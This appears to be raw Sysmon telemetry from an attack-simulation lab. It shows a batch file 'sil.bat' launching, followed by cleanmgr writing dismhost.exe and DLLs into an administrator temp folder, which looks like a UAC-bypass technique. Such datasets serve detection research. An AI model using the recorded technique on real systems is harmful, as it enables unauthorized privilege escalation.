10341000x80000000000000001050560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-32D3-60E8-770B-00000000CF01}63569544C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+18cf7c|C:\Windows\System32\SHELL32.dll+18ccd3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.113{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" "C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x8000000000000000808412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F85CABCAAF543E34A538337C738CA17,SHA256=882549E8A4E1C7D60625BE8A5E0DF7CC817A0B643F5055BE7CAC22EAE534345C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9ED9D1EA375613016F03546325F5421F,SHA256=5B1985B56313FC00FA06AD408A51380870F7D2006C85F4B10973F21D6190BB95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1F13B492FF30E1F8C76A1E44BC0E3F,SHA256=8A32F02E4F4D976FEA2DA6031F3FC409EC2B3AC6DA94DA02B7876631B57B11A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.338{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.86.161.15593-86-161-155.static.isp.telekom.rs63948-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001050611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.039{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51091-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001050610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.039{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51091-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001050609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38638E61D9D7C927EE0935A327E0932,SHA256=4CDBEE2DEE84036FD2BF8C174E450D1B93E7621E1437DB9BC318E3A3050A8769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.100{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:58.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CE7AB474BBD39113F55CA1AEFC3049,SHA256=963A94923168D0E72A41100412C2203B90B81D92B5A6058D995E6E0B2A1A076B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.883{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-0664-60E8-6503-00000000CF01}40245356C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000808414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.497{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-22553-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000808413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.866{466BC892-F5CA-60EB-6B7D-00000000CF01}107610036C:\Windows\system32\cleanmgr.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\system32\Dism\DismCore.dll+273f6|C:\Windows\system32\Dism\DismCore.dll+8eaa|C:\Windows\system32\Dism\DismCore.dll+58d4|C:\Windows\system32\DismApi.DLL+55381|C:\Windows\system32\DismApi.DLL+2c46a|C:\Windows\system32\DismApi.DLL+25f06|C:\Windows\system32\DismApi.DLL+24ceb|C:\Windows\system32\DismApi.DLL+2466f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.864{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe10.0.14393.4169 (rs1_release.210107-1130)Dism Host Servicing ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationDismHost.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe {4E7B5E36-370C-474C-B190-523006628FB1}C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-0667-60E8-D79D-240000000000}0x249dd72HighMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\System32\cleanmgr.exeC:\Windows\system32\cleanmgr.exe /autoclean /d C: 11241100x80000000000000001050790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-winsvc-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-1.dll2021-07-12 07:56:58.830 11241100x80000000000000001050788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l2-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-1.dll2021-07-12 07:56:58.830 11241100x80000000000000001050784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-sddl-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-provider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-lsapolicy-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-1.dll2021-07-12 07:56:58.815 11241100x80000000000000001050779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-cryptoapi-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-base-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-EventLog-Legacy-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Provider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Legacy-L1-1-0.dll2021-07-12 07:56:58.815 